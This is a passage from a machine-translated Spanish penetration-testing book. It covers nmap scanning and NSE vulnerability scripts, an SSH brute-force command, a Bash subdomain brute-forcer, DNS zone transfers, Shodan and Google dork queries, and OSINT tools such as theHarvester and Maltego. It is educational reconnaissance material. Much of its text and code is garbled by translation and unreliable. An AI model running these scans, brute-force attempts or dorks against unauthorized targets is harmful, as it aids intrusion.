ÿÿversionÿintensity9 . PROPINA Siempre puede usar el comando nmap-h para enumerar todas las opciones dentro Nmapaen caso de que olvides alguno de ellos.Te llevará añosde práctica parasabérmelosdecorazón. En el siguiente ejemplo, utilizaremos la opción ÿÿversionÿlight para que sea aún más rápido. Tenga en cuenta que pudimos hacerlo un segundo más rápido que antes sin sacrificar la información de la columna de versión (tal vez un segundo no sea gran problema para un host, pero para un rango de red, hará una gran diferencia): root@kali:~#nmap-p22,53,80,443-T5-sV--version-light10.0.0.1 A partir de Nmap7.80(https://nmap.org) a las 2020-10-0509:41EDT NmapscanreportforUSGPRO(10.0.0.1) Hostsup (0.00099 latencia). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 22/tcpopensh2.0) OpenSSH6.6.1p1Debian4~bpo70+1(protocolo 53/tcpopendomaindnsmasq2.78-23-g9e09429 Canal de Telegram : @IRFaraExam Machine Translated by Google 80/tcpopenhttplighthttpd 443/tcpopenssl/httpUbiquitiEdgerouterhttpd Dirección MAC: B4: FB: E4: 2F: 04: 3D (Ubiquiti Networks) ServiceInfo: SO: Linux; Dispositivo: enrutador; CPE: cpe: / o: linux: linux_kernel Detección de servicio realizada. Informe cualquier resultado incorrecto en https://nmap.org/ submit/. Nmapdone: 1 dirección IP (1 host up) escaneada en 12,60 segundos Sistema operativoToma de huellas dactilares Imagine el siguiente escenario: su gerente o su cliente viene a usted y dice: "Queremos saber si alguien en nuestra red está usando Windows XP". sonría y diga: “Por supuesto, sé cómo hacerlo como un profesional”. aprenderá a identificar el sistema operativo de un host en una LAN utilizando Nmap. Para terminar el trabajo, deberá agregar la opción ÿO para detectar el sistema del host de destino. Nmap intentará identificar el inspeccionando los paquetes recibidos del host. A continuación, Nmap intentará haga coincidir la huella dactilar con una lista guardada. Tenga en cuenta que en el siguiente ejemplo, agregandolasversionescanparaayudaraidentificarelsistemaoperativo: raíz @ kali: ~ # nmap-sV-O-T410.0.0.187 A partir de Nmap7.80(https://nmap.org) a las 2020-10-0509:45EDT NmapscanreportforWin7Lab.ksec.local(10.0.0.187) Hostsup (0.00035 latencia). No se muestra: 990 puertos cerrados VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 135/tcpopenmsrpcMicrosoftWindowsRPC 139 / tcpopennetbios-ssnMicrosoftWindowsnetbios-ssn 445/tcpopenmicrosoft-dsMicrosoftWindows7-10microsoft-ds(grupo de trabajo:GRUPO DE TRABAJO) 5357/tcpopenhttpMicrosoftHTTPAPIhttpd2.0(SSDP/UPnP) 49152/tcpopenmsrpcMicrosoftWindowsRPC 49153/tcpopenmsrpcMicrosoftWindowsRPC 49154/tcpopenmsrpcMicrosoftWindowsRPC 49155/tcpopenmsrpcMicrosoftWindowsRPC 49156/tcpopenmsrpcMicrosoftWindowsRPC 49157/tcpopenmsrpcMicrosoftWindowsRPC Dirección MAC: 00: 0C: 29: 1C: 0E: EE (VMware) Tipo de dispositivo: propósito general Ejecutando:MicrosoftWindows7|2008|8.1 OSCPE: cpe: / o: microsoft: windows_7 :: - cpe: / o: microsoft: windows_7 :: sp1 Canal de Telegram : @IRFaraExam Machine Translated by Google cpe: / o: microsoft: windows_server_2008 :: sp1cpe: / o: microsoft: windows_server_2008: r2cpe: / o: microsoft: windows_8cpe: / o: microsoft: windows_8.1 Detalles del sistema operativo: MicrosoftWindows7SP0-SP1, WindowsServer2008SP8, WindowsSer8 o WindowsServer. NetworkDistance: 1hop ServiceInfo: Host: WIN7LAB; SO: Windows; CPE: cpe: / o: microsoft: windows Detección de SO y servicio realizada. Informe cualquier resultado incorrecto en https:// nmap.org/submit/. Nmapdone: 1 dirección IP (1 host up) escaneada en 66,00 segundos Motor de secuencias de comandos de Nmap El motor de secuencias de comandos de Nmap (NSE) contiene un conjunto de funcionalidades adicionales (como fuerza bruta, enumeración de DNS, enumeración de HTTP, etc.) que hacen que Nmap funcione como un jefe. El equipo de Nmap clasificó todas estas funcionalidades en diferentes grupos, que se muestran aquí: Autorización Transmisión Por defecto Descubrimiento DESDE Explotar Externo Fuzzer Intruso Malware A salvo Versión Vulnerable Para obtener la lista de todos estos scripts NSE, solo enumere el contenido del directorio /usr/share/nmap/scripts : raíz @kali: #ls/usr/share/nmap/scripts/ Canal de Telegram : @IRFaraExam Machine Translated by Google acarsd-info.nsenping- http-hp-ilo-info.nse brute.nse dirección-info.nsenrpe- http-huawei-hg5xx-vuln.nse enum.nse afp-brute.nsentpinfo.nse afp-ls.nsentpmonlist.nse afp-ruta-vuln.nseomp2brute.nse afp-serverinfo.nseomp2-enumobjetivos.nse afp-showmount.nseomroninfo.nse ajpauth.nseopenlookup-info.nse ajp-brute.nseopenvasotp-brute.nse ajp-headers.nsedownload.nse openwebnet-discovery.nse ajp-methods.nseoraclebrute.nse http-icloud-findmyiphone.nse http-icloud-sendmsg.nse http-iis-nombre-corto-brute.nse http-iis-webdav-vuln.nse http-interna-ip-disclosure.nse http-joomla-brute.nse http-jsonp-detección.nse http-litespeed-código fuente http-ls.nse ajp-request.nseoraclebrute-stealth.nse http-majordomo2-dir-transversal.nse allseeingeye-info.nseoracle-enumusers.nse http-malware-host.nse amqp-info.nseoraclesid-brute.nse http-mcmp.nse […] Un ejemplo común es la enumeración HTTP, existe un script NSE para este propósito. Para hacer el trabajo, necesitamos especificar el número de puerto que estamos apuntando primero, y también agregaremos el escaneo de versiones (que es opcional, pero lo recomiendo) para obtener información más jugosa: $nmap-p[número de puerto]-sV–script[NSEscriptname][dirección IP/rango] root@kali:~#nmap-sV-p80--scripthttp-enum10.0.0.1 A partir de Nmap7.80(https://nmap.org) a las 2020-10-0509:51EDT NmapscanreportforUSGPRO(10.0.0.1) Hostsup (0.00082 latencia). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 80/tcpopenhttplighthttpd Canal de Telegram : @IRFaraExam Machine Translated by Google |_http-server-header:Servidor |_httpsredirect:ERROR:Ejecución de script fallida (use-dtodebug) Dirección MAC: B4: FB: E4: 2F: 04: 3D (Ubiquiti Networks) Detección de servicio realizada. Informe cualquier resultado incorrecto en https://nmap.org/ submit/. Nmapdone: 1 dirección IP (1 host up) escaneada en 7,32 segundos NSECCategoryScan Cuando utiliza un análisis de categoría, no especifica los números de puerto, ya que una categoría apuntará a múltiples números de puerto . Antes de que nosotros ( todos los puertos TCP abiertos). root@kali:~#nmap-sV-sC10.0.0.1 A partir de Nmap7.80(https://nmap.org)en2020-10-0509:52EDT NmapscanreportforUSGPRO(10.0.0.1) Hostsup (0.00059 latencia). No se muestra: 996 puertos cerrados PORTSTATESERVICEVERSION 22/ tcpopensshOpenSSH6.6.1p1Debian4~bpo70+1(protocol2.0) |ssh-hostkey:| 102440:a1:21:7f:53:fe:71:41:bb:54:5d:83:1d :44:dd:65(DSA) | 2048fa:08:a3:16:7c:3a:48:e3:7e:d6:ea:2c:6a:5d:15:93(RSA) |25636:d5:77 :3f:f8:6f:a0:36:07:30:7a:43:1f:4d:ac:b5(ECDSA) |_25688:5a:3c:60:df:0a:dd:b2:2b:4e: a8:af:19:d7:f5:9e(ED25519) 53/tcpopendomaindnsmasq2.78-23-g9e09429 |dns-nsid:| _bind.version:dnsmasq-2.78-23-g9e09429 80/tcpopenhttplighttpd |_http-server-header: Servidor |_http-title:No siguió la redirección a https://usgpro/ |_httpsredirect:ERROR:Ejecución de script fallida (use-dtodebug) 443/tcpopenssl/ httpUbiquitiEdgerouterhttpd |http-cookie-flags:|/:|PHPSESSID:|_httponlyflagnotset |_httpserver- encabezado: servidor |_http-title:UniFiSecurityGateway Canal de Telegram : @IRFaraExam Machine Translated by Google |sslcert:Subject:commonName=UbiquitiRouterUI/organizationName=UbiquitiInc./ stateOrProvinceName=Nueva York/countryName=US |SubjectAlternativeName:DNS:UbiquitiRouterUI |No válido antes:2020-03-11T01:02:25 |_Notvalidafter:2022-06-13T01:02:25 |_ssl-date:TLSaleatoriedadnorepresentatiempo Dirección MAC: B4: FB: E4: 2F: 04: 3D (Ubiquiti Networks) ServiceInfo: SO: Linux; Dispositivo: enrutador; CPE: cpe: / o: linux: linux_kernel Detección de servicio realizada. Informe cualquier resultado incorrecto en https://nmap.org/ submit/. Nmapdone: 1 dirección IP (1 host up) escaneada en 24,20 segundos Además, puede usar el modificador ÿA para ejecutar los scripts predeterminados, pero tenga cuidado que esta opción usará lo siguiente: Escaneo de versiones SynTCPscan PredeterminadoNSEscriptscan Escanearsistemasoperativos ruta de seguimiento de red $nmap-A[dirección IP/rango] Otra forma de apuntar a varios scripts en la misma categoría es usar el comodín * . Por ejemplo, para apuntar a todos los scripts relacionados con las vulnerabilidades de Samba, necesita usar el siguiente comando. (Tenga en cuenta que este comando tomará mucho de tiempo para finalizar. En cualquier momento durante la ejecución, puede presionar el botón Intro para obtener el valor del porcentaje de progreso.) root@kali:~#nmap-sV-p135,445--scriptsmb-vuln*10.0.0.187 A partir de Nmap7.80(https://nmap.org) a las 2020-10-0509:54EDT NmapscanreportforWin7Lab.ksec.local(10.0.0.187) Hostsup (0.00027 latencia). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 135/tcpopenmsrpcMicrosoftWindowsRPC 445/tcpopenmicrosoft-dsMicrosoftWindows7-10microsoft-ds(grupo de trabajo:GRUPO DE TRABAJO) Dirección MAC: 00: 0C: 29: 1C: 0E: EE (VMware) Información de servicio: Host: WIN7LAB; SO: Windows; CPE: Canal de Telegram : @IRFaraExam Machine Translated by Google cpe:/o:microsoft:windows Resultados de la secuencia de comandos del host: |_smb-vuln-ms10-054: falso |_smb-vuln-ms10-061:NT_STATUS_ACCESS_DENIED |smb-vuln-ms17-010: |VULNERABLES: |Vulnerabilidad de ejecución remota de código en servidores Microsoft SMBv1 (ms17-010) |Estado:VULNERABLE |ID:CVE:CVE-2017-0143 | Factor de riesgo: ALTO | Existe una vulnerabilidad crítica de ejecución remota de código en Microsoft SMBv1 servidores (ms17-010). |||Fecha de divulgación:2017-03-14 |Referencias: | https://blogs.technet.microsoft.com/msrc/2017/05/12/cliente orientación-para-wannacrypt-ataques/ |https://technet.microsoft.com/en-us/library/security/ms17010.aspx |_https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Detección de servicio realizada. Informe cualquier resultado incorrecto en https://nmap.org/ submit/. Nmapdone: 1 dirección IP (1 host up) escaneada en 12,60 segundos NSEArgumentos Algunos scripts de NSE requerirán que ingrese algunos argumentos adicionales. ejemplo es el ataque de fuerza bruta. Digamos que quiere usar fuerza bruta en el SSH servicio en el host de destino, por lo que deberá agregar el; ÿÿscript ÿargs opción para identifique los archivos para los nombres de usuario/contraseñas: $nmap-p22-sV–scriptssh-brute–script-argsuserdb=usuarios.txt,passdb=contraseñas.txt ElsecretoparaconocertodasestasopcionesparausarelNmapoficialNSE referencia: https://nmap.org/nsedoc/ Enumeración DNS Canal de Telegram : @IRFaraExam Machine Translated by Google ¿Por qué está esta sección en el capítulo de exploración de red? La enumeración de DNS puede permitirnos identificar la naturaleza del host de destino que queremos explorar. Además, la enumeración de DNS utilizará los motores de búsqueda públicos para buscar nombres de dominio ocultos que no conocíamos al comienzo de nuestro compromiso. el objetivo es probablemente un host de enrutador ( ethicalhackingblog.com) es mi dominio; solo estoy dando un ejemplo aquí). DNSFuerza bruta Hay muchas herramientas que buscarán nombres de dominio DNS utilizando la metodología de fuerza bruta. Para empezar, tratemos de comprender cómo funciona una fuerza bruta DNS mediante el desarrollo de nuestro propio Bashscript. Primero, guardemos una lista de subdominios potenciales que podrían existir: www VPN pinchar fuego desarrollador ftp puesta en escena correo PROPINA En la práctica, utilizo los siguientes archivos de diccionario de subdominios de la lista en GitHub: https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS Ahora que hemos definido el archivo de diccionario de nuestro subdominio, es hora de desarrollar el Bashscript: #!/bin/bash #Thisscriptwillbruteforcedomainnames #Prompttousertoenterthedomainname read-p"Ingrese el nombre de dominio que desea usar fuerza bruta:" Canal de Telegram : @IRFaraExam Machine Translated by Google NOMBRE DE DOMINIO functioncheck_domain(){ #Ejecutarelcomandohostyextraerlosresultadossubdominiosactivos=$ (host$SUB_DOMAIN|grep'hasaddress') #ifnotemptyresults if[[-n$results]] then printf"Encontrado$SUB_DOMAIN\n" ser } #leerelarchivodediccionarioparasubin$ (catsub-d.txt) do SUB_DOMAIN=$sub.$DOMAIN_NAME check_domain hecho Vamos a probar mi blog sitio web: root@kali:/opt#./dns-brute.sh Ingrese el nombre de dominio que desea usar fuerza bruta:ethicalhackingblog.com Foundwww.ethicalhackingblog.com Foundftp.ethicalhackingblog.com Transferencia de zona DNS La copia de los registros del servidor maestro DNS en otro servidor esclavo DNS se denomina transferencia DNS. Podemos aprovechar este proceso para obtener la lista de todos los subdominios solicitando el DNS maestro (referido a un servidor NS, por ejemplo ns1.ethicalhackingblog.com ) para proporcionarnos la lista del nombre de dominio de destino. Esta consulta rara vez funciona, pero si tiene éxito, recibirá un regalo que contiene todos los subdominios y sus direcciones IP asociadas. Primero, obtengamos la lista de servidores ns para un nombre de dominio aleatorio: $host-tns[nombre de dominio]|cut-d""-f4 root@kali:/opt#hosttnsgoogle.com|cut-d""-f4 ns4.google.com. ns3.google.com. ns1.google.com. ns2.google.com. Canal de Telegram : @IRFaraExam Machine Translated by Google Ahora que conocemos la lista de servidores DNS, podemos pedirle al servidor los registros DNS. Intentemos preguntarle al servidor ns1 usando el comando host : $host-l[nombre de dominio][nombre de dominio del servidor ns] root@kali:/opt#host-lgoogle.comns1.google.com Uso del servidor de dominio: Nombre: ns1.google.com Dirección: 216.239.32.10#53 Alias: ;Transferencia fallida. Ahora que sabe cómo funcionan los scripts de Bash, puede crear sus propios scripts que extraerán la lista de servidores ns y luego se conectarán a cada uno, y luego podrá solicitar la lista de registros DNS utilizando la técnica de transferencia de zona especificada anteriormente. Ahora comprende el uso y el poder de los scripts de Bash. DNSSubdominiosHerramientas Existen muchas herramientas que analizan en busca de subdominios. Lo que importa es comprender lo que hacen, por lo que debe asegurarse de que la persona elegida hará lo siguiente: 1. Subdominios de fuerza bruta rápidos basados en un archivo de diccionario de buena calidad. 2.Verifique la transferencia de DNS. 3. Automatice la búsqueda de un subdominio en motores de búsqueda de Internet como Google. Intenso Fierce es una excelente herramienta para buscar subdominios. Fierce ejecutará múltiples pruebas de DNS, incluidas transferencias de zona y fuerza bruta también. Es rápido y contiene un buen archivo de diccionario: $fierce-dns[nombre de dominio] root@kali:/opt#fierce-dnsethicalhackingblog.com DNSServersforethicalhackingblog.com: ns66.domaincontrol.com ns65.domaincontrol.com Probando transferencia de zona primero... Testingns66.domaincontrol.com Requesttimedoutortransfernotallowed. Canal de Telegram : @IRFaraExam Machine Translated by Google Testingns65.domaincontrol.com Requesttimedoutortransfernotallowed. Transferencia de zona sin éxito (valió la pena intentarlo) Está bien, probando la buena manera tradicional... fuerza bruta Comprobando DNS comodín... No. Bien. Ahora realizando 2280 pruebas... 45.40.155.145ftp.ethicalhackingblog.com 45.40.155.145www.ethicalhackingblog.com Subredes encontradas (es posible que desee probar aquí usando nma o escaneo de unicornio): 45.40.155.0-255: 2 nombres de host encontrados. Hecho con Fiercescan: http://ha.ckers.org/fierce/ Found2entries. Que tenga un lindo día. No confíe en una sola herramienta para hacer el trabajo; cada herramienta tiene sus pros y sus contras. También se deben considerar otras buenas herramientas de DNS en la búsqueda de subdominios: #sublist3risonGithub $pythonsublist3r.py[nombre de dominio] #subbruteisonGithub $pythonsubbrute.py[nombre de dominio] Resumen Acaba de aprender el primer paso en la escalera de las pruebas de penetración. Idealmente, disfrutó de este capítulo y aprendió algo nuevo. ¡La diversión acaba de comenzar, amigos! Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 4 InternetInformaciónRecopilación Neverunderestimatetheimportanceoftheinformationgatheringphasein penetrationtesting.IadmitthatIusedtounderestimateitmyself, butoverthe años, Ihaverealizedhowvitalthisphasecanbe.OnceIwasworkingona projectthatwasnotyetdeployedintotheproductionenvironment, hablando sopractically, therewasnoinformationyetontheinternet, ¿verdad? Outofcuriosity, me enteredthetestenvironmentURLonGoogle, anditturnedoutthatoneofthe developersaccidentallycopiedtheinternalnetworkURLstoGitHub.That'sjust oneexampleofthehorrorstoriesthatIhavewitnessedduringmycareer. Hablando de historias de terror, una de ellas sucedió con una empresa. El desarrollador empujó a GitHub las credenciales del host de la nube de AWS, y un hacker se aprovechó de esto y se conectó de forma remota al servidor. Por supuesto, puede adivinar el resto. El enfoque de este capítulo es la metodología principal de la fase de prueba de penetración. No debe ejecutar los escáneres a ciegas sin saber lo que está buscando. Uno de los pasos que ya discutimos en el capítulo anterior es la búsqueda de subdominios. Esto es lo que aprenderá en este capítulo: Utilicemotoresdebúsquedadeinternetparaobtenerresultados Él está en Sodod UseGoogleconsultas Vea cómo mostrar información sobre dominios usando la base de datos de Whois Vea cómo funcionan las herramientas esenciales para la huella pasiva en Kali, incluidas El Cosechador, Dmitry y Maltego Huella pasiva y reconocimiento Vamos a definir una minología del metro sobre este tema. Recopilar información de forma pasiva utilizando la información pública de Internet tiene muchos nombres técnicos. Canal de Telegram : @IRFaraExam Machine Translated by Google Algunas personas lo llaman reconocimiento, y otros lo llaman huella pasiva o recopilación de información pasiva. A veces escuchará el nombre OSINT, que significa inteligencia de código abierto. Use cualquier palabra técnica que prefiera, pero asegúrese de no confundirse con todos estos términos, ya que todos significan lo mismo: recopilar datos sobre su objetivo utilizando fuentes disponibles públicamente. Una de las tareas más críticas en la huella pasiva es saber lo que está buscando. Hay muchas herramientas que hacen el trabajo, pero debe comprender lo que hacen en segundo plano. Por lo tanto, estos son los elementos que debe buscar mientras ejecuta su tarea de recopilación de información: subdominios de la empresa sitios web Direcciones IP públicas (incluida la de la nube AWS/Azure) Direcciones IP internas filtradas Registros DNS públicos (registros MXmail, etc.) Credenciales filtradas (principalmente en GitHuborPastebin) Infracciones anteriores Cambio comercial significativo (p. ej., adquisiciones) Información financiera empresarial (esto puede revelar un socio secreto) Números de teléfono de empresa (para ingeniería social) Información pública para empleados (para ingeniería social) Presencia de una empresa en las redes sociales (p. ej., LinkedIn) Motores de búsqueda de Internet Los motores de búsqueda públicos son su entrada en la búsqueda de debilidades vinculadas a su objetivo. En la siguiente sección, verá en detalle cómo aprovechar el motor de búsqueda de Google para obtener toda la información necesaria (fugas). Canal de Telegram : @IRFaraExam Machine Translated by Google tuarsenalkit: Motor de búsqueda de Google: google.com Shodanonlinescanner: shodan.io DuckDuckGosearchengine: duckduckgo.com Shodan Shodan es una excelente herramienta en línea que escaneará Internet por usted. Hay opciones ilimitadas que puede usar en este monstruo. Este es un ejemplo rápido: supongamos que desea encontrar motores Docker que estén visibles en Internet y que escuchen en el puerto 2375 (el número de puerto predeterminado para un demonio Docker). En el ejemplo que se muestra en la Figura 4.1, utilicé la siguiente consulta: puerto:2375producto:"Docker" Figura 4.1 Shodan Este no es el único criterio de consulta que puede utilizar en el sitio de Shodan. La Tabla 4.1 cubre los más populares. Tabla 4.1 Los criterios de consulta más comunes utilizados en el sitio de Shodan FILTRO DE BÚSQUEDA DESCRIPCIÓN Puerto Número de puerto EJEMPLO Puerto: 80 Canal de Telegram : @IRFaraExam Machine Translated by Google Puerto Número de puerto Producto Nombre del producto Org Nombre de la Organización País Nombre del país de dos letras País: CA Nombre Nombre de la ciudad Ciudad:Montreal de host de la ciudad Nombre de dominio Nombre de host: "nombre de dominio.com" Servidor Nombre del servidor Servidor: "Linux" http.título título de la página web http.title:“Panel de control” Puerto: 80 Producto: "Apache" Org: "Nombre de la empresa de destino". Puede consultar algunos ejemplos prácticos en www.shodan.io/explore . Consultas de Google Google es un potente buscador que te permitirá encontrar la información que está buscando (por ejemplo, credenciales filtradas sobre su cliente/empleador) si usted sabe cómo usarlo correctamente. Google le da la posibilidad de consultar su base de datos con criterios de filtro avanzados. Algunas personas lo llaman el hacking de Google base de datos (GHDB), mientras que otros llaman Googledorks. Comencemos con el primer sitio: consulta que siempre uso al comienzo de mi compromiso, como se muestra en la Figura 4.2. Esta consulta específica le permitirá buscar forallthewebpagesandsitesassociatedwithyourtargetdomainname(this la consulta también revelará subdominios). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 4.2 GoogleDorkSiteFilter Actualmente, todo se publica públicamente en GitHub. Aquí hay una consulta interesante que puede usar en Google para buscar información interesante publicada en GitHub. La figura 4.3 muestra la seguridad de los resultados de la consulta extraída al buscar en GitHub.com utilizando las palabras clave GusKhawaja : sitio: github.com [palabras clave] Figura 4.3 GoogleDorkSiteFilterwithDescription Este es solo un ejemplo, pero le sorprenderá la cantidad de veces que descubrirá información filtrada en GitHub durante un compromiso. Los desarrolladores tienden a usar GitHub sin comprender las consecuencias, y usted, como profesional en este campo, puede aprovechar esta falla. La tabla 4.2 enumera algunas otras consultas interesantes que puede utilizar en Google. Table4.2 GoogleDorksCommonQueries CONSULTA DESCRIPCIÓN EJEMPLO inurl: [criterios] BuscarcandidatosSQLicenunsitioweb: BuscartextodentrodeunaURL sitio:[dominio]inurl:?id= Buscartextodentro BuscarCCTV: Canal de Telegram : @IRFaraExam Machine Translated by Google título: [criterios] eltítulodeunapáginaweb Buscar tipos de archivos por tipo de archivo: usando sus extensiones [extensión de archivo] intitle:"índice de" "cctv" Busque archivos conectados a un dominio que pertenecen a su objetivo: Sitio:[dominio]tipo de archivo:"xls|xlsx|doc|docx| ppt|pptx|pdf" Puede usar las consultas de GHDB en Exploitÿdb para visualizar las últimas mareas. muestra en la Figura 4.4. fuera de www.exploit-db.com/google-hacking-database Compruébelo como ,(Exploitÿ se dpertenecealequipo de Offensive Security, los fundadores de KaliLinux.) Figura 4.4 Base de datos de Google Hacking Recopilación de información usando KaliLinux Hay muchas herramientas preinstaladas en KaliLinux que puede usar para la recopilación pasiva de información (Figura 4.5). Muchas herramientas tienen funcionalidades comunes, algunas de las cuales son completamente gratuitas (p. ej., Dmitry), mientras que otras tienen acceso limitado a funciones a menos que pague una suscripción anual (p. ej., Maltego). En las próximas secciones, aprenderá sobre las aplicaciones típicas que puede usar para el escaneo pasivo. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 4.5 KaliMenu : recopilación de información Base de datos Whois Cada entidad (una empresa o una sola persona) que compra un nombre de dominio debe ingresar su información personal antes del proceso de registro. La mayor parte de esta información se publicará públicamente en la base de datos de Whois . ). Para usar la debilidad de la base de datos Whois, puede usar el comando Whois en su Kali Linux. $whois[dominio] Aquí hay una muestra del resultado de la consulta whois (la siguiente información es ficticia): root@kali:~#whois[nombre-de-dominio.com] Nombre de dominio: acme.com ID de dominio de registro: 2425408_DOMAIN_COM-VRSN Canal de Telegram : @IRFaraExam Machine Translated by Google RegistradorWHOISServer:WHOIS.test.COM URL de registro: WWW.test.COM Fecha de actualización:2020-03-20T07:43:10.00Z Fecha de creación:1991-04-17T04:00:00.00Z RegistradorRegistrationExpirationDate:2021-04-18T04:00:00.00Z Registrador: Ecorp, INC. RegistradorIANAID:48 DomainStatus:clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited Nombre del registrante: JohnDoe Organización del Registrante:EcorpInc Registrante Calle: 1234 ConeyIsland RegistranteCiudad:Brooklyn Estado/provincia del registrante: NY RegistrantPostalCode: 888999 País del registrante: EE. UU. RegistrantPhone:RegistrantPhoneExt:RegistrantFax:RegistrantEmail:https://tieredaccess.com/contact/435 44cc-bab5-cda7d58313c4 AdminNombre:Sr.Robot Organización administrativa: ECorpInc AdminStreet:AdminStreet:AdminCity:AdminState/Province:AdminPostalCode:AdminCountry:AdminPhone:A Canal de Telegram : @IRFaraExam Machine Translated by Google Servidor de nombres: NS1.ECORP.COM Servidor de nombres: NS2.ECORP.COM DNSSEC: sin firmar En resumen, esto es lo que Whois revelará como información pública: nombre del registrante Teléfono de contacto Dirección de correo electrónico Dirección física de la entidad fecha de caducidad del dominio Servidores NS (servidores de nombres) lacosechadora Encontrar la dirección de correo electrónico es crucial si va a realizar una actividad social. ataque de ingeniería o ejercicio de phishing. direcciones si eres un experto ya que ya sabes cuál es el formato del correo electrónico se parece (por ejemplo, nombre.apellido@dominio.tld ). Hay muchas herramientas en la naturaleza para este propósito. sigue haciendo un gran trabajo, se llama Cosechadora. motores de búsqueda como Google para filtrar los resultados: $theHarvester-d[dominio]-b[fuentes en línea]-s root@kali:~#theHarvester-dethicalhackingblog.com-ball-s tableresultsalreadyexists **************************************************** **************** * ___ *||_||_____/\/\________________||_______*|__|_\/\//_//_`|'__\\//\/__|__/_\'__|*| |_|||| _ _ __///(_|| __ |\V/__/\__\||__/|*\__|_||_|\___|\//_/ \__,_|_|\_/\___||___/\__\ ___|_| * *theHarvester3.1.0*Codificado porChristianMartorella*EdgeSecurityResearch*cmartorella@edgesecurity.com * **************************************************** **************** Canal de Telegram : @IRFaraExam * * * * * * * * * * * Machine Translated by Google [*]Objetivo:ethicalhackingblog.com [*]Buscando en Yahoo. [*]BuscandoCertSpotter. Búsqueda de resultados. [*]BuscandoIntelx. Ha ocurrido una excepción en Intelxsearch: [Errno2] Nosuchfileordirectory:'api-keys.yaml' [*]Buscando en Google. Buscando0resultados. Buscando100resultados. Buscando200resultados. Buscando300resultados. Buscando400resultados. Buscando500resultados. [*]BuscandoHunter. [*]BuscandoVirusTotal. Búsqueda de resultados. [*]BuscandoBaidu. [*]BuscandoSecurityTrails. [*]Buscando multitud de amenazas. Búsqueda de resultados. [*]BuscandoBing. [*]Buscar nombres de usuario de Twitter usando Google. [*]Usuarios encontrados:3 --------------------@GusKhawaja @fotogramas clave @medios de comunicación […] -d es para especificar el nombre de su objetivo. (Si usa el éticahackingblog.com nombre de dominio como se muestra en la figura, no se sorprendido si no encuentra resultados porque el dominio está protegido para tales ataques.) ÿs es buscar en el motor web de Shodan. ÿB es el nombre de la fuente de datos en línea ; en la figura, los he elegido todos. Esta es la lista de la que puede elegir (utilice el comando de ayuda ÿh para mas opciones): Baidu Canal de Telegram : @IRFaraExam Machine Translated by Google API de Bing certificador Crtsh DnsDumpster pila de perros Pato Pato a ganar código Github Google Cazador Intelx Linkedin y Linkedin_enlaces netcraft Otx SeguridadSenderos Multitud de amenazas Trello Gorjeo host virtual VirusTotal yahoo Todo (ejecuta todas las fuentes de datos anteriores) Dmitry DMitry, que significa “herramienta de recopilación de información mágica profunda”, es otra aplicación que hace varias cosas al mismo tiempo: ÿw :PerformaWhoislookup. ÿn :Recuperar registros de Netcraft.com sobre el objetivo Canal de Telegram : @IRFaraExam Machine Translated by Google -s :busca subdominios. ÿE: Searchfore ÿ direcciones de correo. P: Explorar puerto abierto TCP (esto no es pasivo). root@kali:~#dmitry-wnse[nombre-de-dominio.com] Maltego Maltego es ideal para la recopilación pasiva de información. Uno podría escribir un libro completo sobre esta herramienta porque contiene todo lo que necesita para hacer el trabajo. Si desea utilizar todas las funcionalidades, debe pagar una licencia anual. Si es un profesional, esta herramienta es imprescindible, pero aún puede utilizar la versión limitada y obtener resultados decentes. TransformarHub TransformHub, que se muestra en la Figura 4.6, es una colección de sitios donde Maltego obtendrá los datos (por ejemplo, Shodan, Kaspersky, VirusTotal, etc.). De manera predeterminada, la mayoría de estas fuentes de datos no están instaladas; debe hacer clic en cada una de las que desea instalar. Hay varios tipos de fuentes de datos: Pagado por separado: tendrá que pagar directamente por estos servicios web; no están incluidos en las tasas de licencia de Maltego. Gratis: muchas de estas fuentes de datos son completamente gratuitas. API autenticada: algunos de estos servicios requerirán que abra una cuenta, luego le darán un token de API para autenticarse y usar sus datos. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 4.6 MaltegoTransformHub Creación de un gráfico El gráfico es la pieza central de Maltego. En esta sección, ejecutará sus escaneos pasivos. Antes de comenzar un escaneo, primero deberá seleccionar una entidad (por ejemplo, una persona, una empresa, un nombre de dominio, etc.). Veamos un ejemplo práctico; seleccionaremos el DNS del blog de hacking ético como una entidad, como se muestra en la figura 4.7. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 4.7 Entidades de Maltego Al hacer clic derecho en la entidad, puede ver todos los tipos de escaneos que puede ejecutar (Figura 4.8). Los principiantes siempre tienen la tentación de hacer clic en Todas las transformaciones (solía pensar de esa manera cuando comencé a usar estas herramientas hace muchos años). En su lugar, debe ejecutar los escaneos de transformación uno por uno para evaluar cada escaneo por separado. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 4.8 Transformaciones de Maltego A continuación, haga clic en Convertir a dominio y ejecute el análisis A dominios. (Haga clic en la flecha de reproducción a la derecha, como se muestra en la Figura 4.9, para ejecutar el análisis). Figura 4.9 MaltegoToDomainsTransform En esta etapa, Maltego mostrará visualmente el nombre de dominio asociado al DNS (Figura 4.10). Perfecto. Ahora, cuando haga clic con el botón derecho en la entidad del nombre de dominio, debería ver más opciones de transformación (Figura 4.11). Canal de Telegram : @IRFaraExam Machine Translated by Google A continuación, haga clic en las flechas dobles junto al elemento DNS From Domain para ejecutar todas las pruebas de subdominios . (Figura 4.12): Figura 4.10 MaltegoDomainName /DNS Figura 4.11 Transformaciones de nombre de dominio Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 4.12 Gráfico de subdominios de Maltego Aquí las opciones son infinitas: puede elegir cada tipo de entidad y hacer clic derecho para visualizar los diferentes tipos de información que puede consultar desde Internet. Tenga en cuenta que esta demostración muestra la versión paga de Maltego 4.2.9, pero también puede realizar la mayoría de los escenarios en la edición gratuita. Somesecurityfolksusefreetoolslikerecon ngthatdoajobsimilartotheone executedinMaltego. (Recon ngisaPythonscannerforinformationgathering thatuseswebAPIservicestofetchitsdata.) Foreducationalpurposes, itisnot harmfultotrythesefreetools.However, ifanorganizationiscountingonyour trabajo, thenmoneyshouldnotbeanobstacle, anditis, inthiscase, recomienda 